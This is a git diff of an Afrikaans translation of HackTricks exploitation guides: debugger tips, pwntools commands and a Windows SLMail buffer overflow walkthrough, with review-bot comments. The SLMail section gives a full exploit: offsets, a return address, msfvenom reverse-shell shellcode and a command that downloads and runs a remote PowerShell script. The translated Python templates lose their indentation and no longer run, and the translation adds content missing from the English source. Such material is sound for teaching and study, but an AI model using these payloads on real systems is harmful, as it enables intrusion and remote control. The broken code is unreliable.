wanneer dit uitgevoer word.** Jy kan GDB dieselfde adresse laat hê deur die volgende te doen: * `unset env LINES` * `unset env COLUMNS` -* `set env _=` _Put the absolute path to the binary_ -* Exploit the binary using the same absolute route -* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary +* `set env _=` _Plaas die absolute pad na die binêre lêer_ +* Exploiteer die binêre lêer deur dieselfde absolute roete te gebruik +* `PWD` en `OLDPWD` moet dieselfde wees wanneer jy GDB gebruik en wanneer jy die binêre lêer uitbuit -### Backtrace to find functions called - -When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). 
In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\ -You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called: +### Terugvoetspoor om opgeroepde funksies te vind +Wanneer jy 'n **staties gekoppelde binêre lêer** het, sal al die funksies aan die binêre lêer behoort (en nie aan eksterne biblioteke nie). In hierdie geval sal dit moeilik wees om **die vloei te identifiseer wat die binêre lêer volg om byvoorbeeld vir gebruikersinvoer te vra**.\ +Jy kan hierdie vloei maklik identifiseer deur die binêre lêer met **gdb** te **hardloop** totdat jy gevra word vir invoer. Stop dit dan met **CTRL+C** en gebruik die **`bt`** (**terugvoetspoor**) bevel om die opgeroepde funksies te sien: ``` gef➤ bt #0 0x00000000004498ae in ?? () 
@@ -145,95 +169,88 @@ gef➤ bt #3 0x00000000004011a9 in ?? () #4 0x0000000000400a5a in ?? () ``` +## GDB-bediener -## GDB server - -`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine) +`gdbserver --multi 0.0.0.0:23947` (in IDA moet jy die absolute pad van die uitvoerbare lêer in die Linux-masjien en in die Windows-masjien invul) # Ghidra -## Find stack offset +## Vind stapelverskuiwing -**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\ -For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ -_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._ +**Ghidra** is baie nuttig om die **verskuiwing** vir 'n **buffer-oorvloei te vind danksy die inligting oor die posisie van die plaaslike veranderlikes.**\ +Byvoorbeeld, in die voorbeeld hieronder, dui 'n buffer-oorvloei in `local_bc` aan dat jy 'n verskuiwing van `0xbc` benodig. 
Verder, as `local_10` 'n kanariekoek is, dui dit aan dat daar 'n verskuiwing van `0xac` is om dit vanaf `local_bc` te oorskryf.\ +_Onthou dat die eerste 0x08 waar die RIP gestoor word, aan die RBP behoort._ ![](<../../.gitbook/assets/image (616).png>) # GCC -**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\ -**-o** --> Output\ -**-g** --> Save code (GDB will be able to see it)\ -**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> To deactivate the ASLR in linux +**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kompileer sonder beskerming\ +**-o** --> Uitset\ +**-g** --> Stoor kode (GDB sal dit kan sien)\ +**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> Om die ASLR in Linux te deaktiveer -**To compile a shellcode:**\ -**nasm -f elf assembly.asm** --> return a ".o"\ -**ld assembly.o -o shellcodeout** --> Executable +**Om 'n skulpkode te kompileer:**\ +**nasm -f elf assembly.asm** --> Gee 'n ".o"\ +**ld assembly.o -o shellcodeout** --> Uitvoerbaar # Objdump -**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\ -**-Mintel** --> **Intel** syntax\ -**-t** --> **Symbols** table\ -**-D** --> **Disassemble all** (address of static variable)\ -**-s -j .dtors** --> dtors section\ -**-s -j .got** --> got section\ -\-D -s -j .plt --> **plt** section **decompiled**\ -**-TR** --> **Relocations**\ -**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\ -**objdump -D ./exec | grep "VAR\_NAME"** --> Address or a static variable (those are stored in DATA section). 
+**-d** --> Ontbind uitvoerbare afdelings (sien opkode van 'n gekompileerde skulpkode, vind ROP-toestelle, vind funksie-adres...)\ +**-Mintel** --> **Intel** sintaksis\ +**-t** --> **Simbole**-tabel\ +**-D** --> Ontbind alles (adres van statiese veranderlike)\ +**-s -j .dtors** --> dtors-afdeling\ +**-s -j .got** --> got-afdeling\ +\-D -s -j .plt --> **plt**-afdeling **ontbind**\ +**-TR** --> **Herskikkinge**\ +**ojdump -t --dynamic-relo ./exec | grep puts** --> Adres van "puts" om in GOT te wysig\ +**objdump -D ./exec | grep "VAR\_NAME"** --> Adres van 'n statiese veranderlike (hierdie word in DATA-afdeling gestoor). -# Core dumps +# Kernaflewerings -1. Run `ulimit -c unlimited` before starting my program -2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` +1. Voer `ulimit -c unlimited` uit voordat jy my program begin +2. Voer `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` uit 3. sudo gdb --core=\ --quiet -# More +# Meer -**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\ -**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Loop to see if the address changes a lot\ -**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset of "system"\ -**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh" +**ldd uitvoerbare | grep libc.so.6** --> Adres (as ASLR, verander dit dan elke keer)\ +**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Lus om te sien of die adres baie verander\ +**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Verskuiwing van "system"\ +**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Verskuiwing van "/bin/sh" -**strace executable** --> Functions called by the executable\ -**rabin2 -i ejecutable -->** Address of all the functions +**strace uitvoerbare** --> Funksies wat deur die uitvoerbare aangeroep word\ +**rabin2 -i ejecutable -->** Adres van al die funksies # **Inmunity debugger** - ```bash !mona 
modules #Get protections, look for all false except last one (Dll of SO) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) ``` - # IDA -## Debugging in remote linux - -Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary: +## Debugging in afgeleë Linux +Binêre lêers wat gebruik kan word om 'n binêre lêer binne 'n Linux te ontleed, kan binne die IDA-vouer gevind word. Om dit te doen, skuif die binêre lêer _linux\_server_ of _linux\_server64_ na die Linux-bediener en voer dit uit binne die vouer wat die binêre lêer bevat: ``` ./linux_server64 -Ppass ``` - -Then, configure the debugger: Debugger (linux remote) --> Proccess options...: +Stel dan die debugger in: Debugger (linux remote) --> Proses opsies...: ![](<../../.gitbook/assets/image (101).png>)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index 8675450ff..eb927c514 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -1,133 +1,123 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - ``` pip3 install pwntools ``` - # Pwn asm -Get opcodes from line or file. - +Kry opcodes van 'n lyn of lêer. ``` -pwn asm "jmp esp" +pwn asm "jmp esp" pwn asm -i ``` +**Kan kies:** -**Can select:** +* uitvoertipe (rou, heks, string, elf) +* uitvoerlêerkonteks (16,32,64,linux,windows...) +* vermyt byte (nuwe lyne, nul, 'n lys) +* kies 'n enkoder om die shellkode te debugeer deur gdb die uitvoer te laat loop -* output type (raw,hex,string,elf) -* output file context (16,32,64,linux,windows...) -* avoid bytes (new lines, null, a list) -* select encoder debug shellcode using gdb run the output - -# **Pwn checksec** - -Checksec script +# **Pwn checksec** +Checksec-skrip ``` pwn checksec ``` - # Pwn constgrep -# Pwn cyclic - -Get a pattern +# Pwn siklies +Kry 'n patroon ``` pwn cyclic 3000 pwn cyclic -l faad ``` +**Kan kies:** -**Can select:** - -* The used alphabet (lowercase chars by default) -* Length of uniq pattern (default 4) -* context (16,32,64,linux,windows...) -* Take the offset (-l) +* Die gebruikte alfabet (standaard kleinletters) +* Lengte van unieke patroon (standaard 4) +* Konteks (16,32,64,linux,windows...) +* Neem die offset (-l) # Pwn debug -Attach GDB to a process - +Hef GDB aan 'n proses aan ``` pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug --process bash ``` +**Kan kies:** -**Can select:** - -* By executable, by name or by pid context (16,32,64,linux,windows...) -* gdbscript to execute -* sysrootpath +* Volgens uitvoerbare lêer, naam of pid konteks (16,32,64,linux,windows...) +* gdbskrip om uit te voer +* sysrootpad # Pwn disablenx -Disable nx of a binary - +Deaktiveer nx van 'n binêre lêer ``` pwn disablenx ``` - # Pwn disasm -Disas hex opcodes - +Ontbind heksadesimale opcodes ``` pwn disasm ffe4 ``` +**Kan kies:** -**Can select:** - -* context (16,32,64,linux,windows...) -* base addres -* color(default)/no color +* konteks (16,32,64,linux,windows...) 
+* basisadres +* kleur (standaard)/geen kleur # Pwn elfdiff -Print differences between 2 fiels - +Druk verskille tussen 2 lêers af ``` pwn elfdiff ``` +# Grys hex -# Pwn hex - -Get hexadecimal representation - +Kry die heksadesimale voorstelling ```bash pwn hex hola #Get hex of "hola" ascii ``` - # Pwn phd -Get hexdump +Kry hexdump +```python +from pwn import * + +# Verbind met die bediener +r = remote('example.com', 1337) + +# Kry die hexdump van die ontvangsdata +data = r.recv() +hexdump(data) +``` + +Die `hexdump`-funksie in `pwntools` kan gebruik word om die ontvangsdata in 'n hexdump-formaat te vertoon. Hier is 'n voorbeeld van hoe om dit te gebruik. Eerstens, maak 'n verbind met die bediener deur die `remote`-funksie te gebruik en die bediener se adres en poortnommer te spesifiseer. Dan, ontvang die data van die bediener deur die `recv`-funksie te gebruik. Laastens, gebruik die `hexdump`-funksie om die data in 'n hexdump-formaat te vertoon. ``` pwn phd ``` +**Kan kies:** -**Can select:** - -* Number of bytes to show -* Number of bytes per line highlight byte -* Skip bytes at beginning +* Aantal bytes om te wys +* Aantal bytes per lyn om te beklemtoon +* Slaan bytes aan die begin oor # Pwn pwnstrip 
@@ -135,70 +125,59 @@ pwn phd # Pwn shellcraft -Get shellcodes - +Kry skuldkodes ``` -pwn shellcraft -l #List shellcodes +pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name pwn shellcraft -f hex amd64.linux.sh #Create in C and run -pwn shellcraft -r amd64.linux.sh #Run to test. Get shell +pwn shellcraft -r amd64.linux.sh #Run to test. Get shell pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` +**Kan kies:** -**Can select:** +* shellkode en argumente vir die shellkode +* Uitlêer +* uitvoerformaat +* foutopsporing (heg dbg aan shellkode) +* voor (foutopsporingsval voor kode) +* na +* vermy gebruik van opcodes (verstek: nie nul en nuwe lyn) +* Voer die shellkode uit +* Kleur/geen kleur +* lys stelseloproepe +* lys moontlike shellkodes +* Genereer ELF as 'n gedeelde biblioteek -* shellcode and arguments for the shellcode -* Out file -* output format -* debug (attach dbg to shellcode) -* before (debug trap before code) -* after -* avoid using opcodes (default: not null and new line) -* Run the shellcode -* Color/no color -* list syscalls -* list possible shellcodes -* Generate ELF as a shared library - -# Pwn template - -Get a python template +# Pwn sjabloon +Kry 'n Python-sjabloon ``` pwn template ``` - -**Can select:** host, port, user, pass, path and quiet +**Kan kies:** gasheer, poort, gebruiker, wagwoord, pad en stil # Pwn unhex -From hex to string - +Van heks na string ``` pwn unhex 686f6c61 ``` +# Pwn opdatering -# Pwn update - -To update pwntools - +Om pwntools op te dateer ``` pwn update ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index f1d59b8f0..fc7c4ce68 100644 --- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -1,33 +1,59 @@ -# Windows Exploiting (Basic Guide - OSCP lvl) +# Windows Exploiting (Basiese Gids - OSCP vlak)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## **Start installing the SLMail service** +## **Begin met die installeer van die SLMail-diens** -## Restart SLMail service - -Every time you need to **restart the service SLMail** you can do it using the windows console: +## Herlaai SLMail-diens +Elke keer as jy die diens SLMail wil **herlaai**, kan jy dit doen deur die Windows-konsole te gebruik: ``` net start slmail ``` - ![](<../.gitbook/assets/image (23) (1).png>) -## Very basic python exploit template +## Baie basiese Python uitbuitingsjabloon +```python +#!/usr/bin/env python3 + +import socket + +# Verander hierdie waardes om die doelwit se IP-adres en poortnommer te spesifiseer +target_ip = "192.168.1.100" +target_port = 1337 + +# Skep 'n verbindingsobjek +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +# Verbind met die doelwit +s.connect((target_ip, target_port)) + +# Stuur 'n uitbuitingsstring na die doelwit +exploit_string = b"Exploit string goes here" +s.send(exploit_string) + +# Ontvang die antwoord van die doelwit +response = s.recv(1024) +print(response.decode()) + +# Sluit die verbindingsobjek +s.close() +``` + +Hierdie is 'n baie basiese sjabloon vir 'n Python-uitbuiting. Jy kan die waardes van `target_ip` en `target_port` verander om die IP-adres en poortnommer van die teiken te spesifiseer. Vervang die `exploit_string` met die spesifieke uitbuitingsstring wat jy wil stuur. Die program sal die uitbuitingsstring na die teiken stuur en die antwoord ontvang en druk. ```python #!/usr/bin/python 
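Review bot: The `## Baie basiese Python uitbuitingsjabloon` section gains a second, newly written Python 3 socket template (`target_ip = "192.168.1.100"`, `target_port = 1337`, `exploit_string = b"Exploit string goes here"`) plus an explanatory paragraph, neither of which exists in the English source; a translation PR should not introduce content, and the added block sits directly above the original Python 2 template it duplicates (`#!/usr/bin/python`, `print "..."`). Remove the added block and paragraph so the section mirrors the source. The blank line before the `net start slmail` fence is also dropped here and in later hunks; keep the fence spacing identical to the English page.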
@@ -39,99 +65,89 @@ port = 110 buffer = 'A' * 2700 try: - print "\nLaunching exploit..." - s.connect((ip, port)) - data = s.recv(1024) - s.send('USER username' +'\r\n') - data = s.recv(1024) - s.send('PASS ' + buffer + '\r\n') - print "\nFinished!." +print "\nLaunching exploit..." +s.connect((ip, port)) +data = s.recv(1024) +s.send('USER username' +'\r\n') +data = s.recv(1024) +s.send('PASS ' + buffer + '\r\n') +print "\nFinished!." except: - print "Could not connect to "+ip+":"+port +print "Could not connect to "+ip+":"+port ``` +## **Verander Immunity Debugger-lettertipe** -## **Change Immunity Debugger Font** +Gaan na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` -Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` - -## **Attach the proces to Immunity Debugger:** +## **Koppel die proses aan Immunity Debugger:** **File --> Attach** ![](<../.gitbook/assets/image (24) (1) (1).png>) -**And press START button** +**En druk die START-knoppie** -## **Send the exploit and check if EIP is affected:** +## **Stuur die uitbuit en kyk of EIP geraak word:** ![](<../.gitbook/assets/image (25) (1) (1).png>) -Every time you break the service you should restart it as is indicated in the beginnig of this page. +Elke keer as jy die diens breek, moet jy dit herbegin soos aangedui aan die begin van hierdie bladsy. -## Create a pattern to modify the EIP +## Skep 'n patroon om die EIP te wysig -The pattern should be as big as the buffer you used to broke the service previously. +Die patroon moet so groot wees as die buffer wat jy vantevore gebruik het om die diens te breek. ![](<../.gitbook/assets/image (26) (1) (1).png>) - ``` /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 ``` +Verander die buffer van die uitbuit en stel die patroon in en voer die uitbuit uit. -Change the buffer of the exploit and set the pattern and lauch the exploit. 
- -A new crash should appeard, but with a different EIP address: +'n Nuwe crash moet verskyn, maar met 'n ander EIP-adres: ![](<../.gitbook/assets/image (27) (1) (1).png>) -Check if the address was in your pattern: +Kyk of die adres in jou patroon was: ![](<../.gitbook/assets/image (28) (1) (1).png>) - ``` /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438 ``` +Lyk asof **ons die EIP in offset 2606 kan wysig** van die buffer. -Looks like **we can modify the EIP in offset 2606** of the buffer. - -Check it modifing the buffer of the exploit: - +Kyk daarna deur die buffer van die aanval te wysig: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` - -With this buffer the EIP crashed should point to 42424242 ("BBBB") +Met hierdie buffer moet die EIP-gekraakte punt na 42424242 ("BBBB") wys. ![](<../.gitbook/assets/image (30) (1) (1).png>) ![](<../.gitbook/assets/image (29) (1) (1).png>) -Looks like it is working. +Dit lyk asof dit werk. -## Check for Shellcode space inside the stack +## Kontroleer vir Shellcode-ruimte binne die stapel -600B should be enough for any powerfull shellcode. - -Lets change the bufer: +600B moet genoeg wees vir enige kragtige shellcode. +Laat ons die buffer verander: ``` buffer = 'A'*2606 + 'BBBB' + 'C'*600 ``` - -launch the new exploit and check the EBP and the length of the usefull shellcode +Begin deur die nuwe uitbuiting te begin en die EBP en lengte van die bruikbare skuldkode te kontroleer. ![](<../.gitbook/assets/image (31) (1).png>) ![](<../.gitbook/assets/image (32) (1).png>) -You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here. +Jy kan sien dat wanneer die kwesbaarheid bereik word, wys die EBP na die skuldkode en dat ons baie spasie het om 'n skuldkode hier te plaas. -In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough. +In hierdie geval het ons **vanaf 0x0209A128 tot 0x0209A2D6 = 430B.** Genoeg. 
-## Check for bad chars - -Change again the buffer: +## Kontroleer vir slegte karakters +Verander weer die buffer: ``` badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" @@ -153,30 +169,27 @@ badchars = ( ) buffer = 'A'*2606 + 'BBBB' + badchars ``` +Die slegte karakters begin by 0x01 omdat 0x00 amper altyd sleg is. -The badchars starts in 0x01 because 0x00 is almost always bad. +Voer die aanval herhaaldelik uit met hierdie nuwe buffer deur die karakters wat nutteloos is, te verwyder: -Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:. +Byvoorbeeld: -For example: - -In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09). +In hierdie geval kan jy sien dat **jy nie die karakter 0x0A moet gebruik nie** (niks word in die geheue gestoor aangesien die karakter 0x09 is). ![](<../.gitbook/assets/image (33) (1).png>) -In this case you can see that **the char 0x0D is avoided**: +In hierdie geval kan jy sien dat **die karakter 0x0D vermy word**: ![](<../.gitbook/assets/image (34) (1).png>) -## Find a JMP ESP as a return address - -Using: +## Vind 'n JMP ESP as 'n terugkeeradres +Gebruik: ``` !mona modules #Get protections, look for all false except last one (Dll of SO) ``` - -You will **list the memory maps**. Search for some DLl that has: +Jy sal die geheuekaarte lys. Soek na 'n paar DLL's wat die volgende eienskappe het: * **Rebase: False** * **SafeSEH: False** 
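Review bot: The Python template in this hunk loses its indentation: every line inside `try:` and `except:` goes from `-    print "\nLaunching exploit..."` to `+print "\nLaunching exploit..."`, which turns the block into a syntax error (`IndentationError: expected an indented block`) instead of the working template the page promises. Code blocks should be byte-identical in a translation; restore the four-space indent. The term "skuldkode" also reappears here ("die bruikbare skuldkode", "wys die EBP na die skuldkode") while the headings use "Shellcode"; pick one term, preferably the untranslated "shellcode".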
@@ -186,30 +199,25 @@ You will **list the memory maps**. Search for some DLl that has: ![](<../.gitbook/assets/image (35) (1).png>) -Now, inside this memory you should find some JMP ESP bytes, to do that execute: - +Nou, binne hierdie geheue moet jy 'n paar JMP ESP-bytes vind. Om dit te doen, voer die volgende uit: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case ``` - -**Then, if some address is found, choose one that don't contain any badchar:** +**Dan, as 'n adres gevind word, kies een wat geen slegte karakters bevat nie:** ![](<../.gitbook/assets/image (36) (1).png>) -**In this case, for example: \_0x5f4a358f**\_ - -## Create shellcode +**In hierdie geval, byvoorbeeld: \_0x5f4a358f**\_ +## Skep shellcode ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d' ``` +As die uitbuit nie werk nie, maar dit moet (jy kan sien met ImDebg dat die shellcode bereik word), probeer om ander shellcodes te skep (msfvenom sal verskillende shellcodes skep vir dieselfde parameters). -If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters). - -**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit: - +**Voeg 'n paar NOPS aan die begin** van die shellcode by en gebruik dit en die terugkeeradres om te JMP ESP, en voltooi die uitbuit: ```bash #!/usr/bin/python 
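Review bot: Terminology drifts within this hunk: "uitbuit" is used for "exploit" ("As die uitbuit nie werk nie", "voltooi die uitbuit") whereas the previous hunk used "uitbuiting" and "aanval"; settle on one noun for "exploit" across the page. The unchanged context line `# Search for opcodes insie dll space (JMP ESP)` carries an "inside" typo from the source; not this PR's job, but worth an upstream follow-up.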
@@ -248,39 +256,36 @@ shellcode = ( buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode try: - print "\nLaunching exploit..." - s.connect((ip, port)) - data = s.recv(1024) - s.send('USER username' +'\r\n') - data = s.recv(1024) - s.send('PASS ' + buffer + '\r\n') - print "\nFinished!." +print "\nLaunching exploit..." +s.connect((ip, port)) +data = s.recv(1024) +s.send('USER username' +'\r\n') +data = s.recv(1024) +s.send('PASS ' + buffer + '\r\n') +print "\nFinished!." except: - print "Could not connect to "+ip+":"+port +print "Could not connect to "+ip+":"+port ``` - {% hint style="warning" %} -There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode +Daar is shellcodes wat **hulself sal oorskryf**, daarom is dit belangrik om altyd 'n paar NOPs voor die shellcode by te voeg. {% endhint %} -## Improving the shellcode - -Add this parameters: +## Verbetering van die shellcode +Voeg hierdie parameters by: ``` EXITFUNC=thread -e x86/shikata_ga_nai ``` -
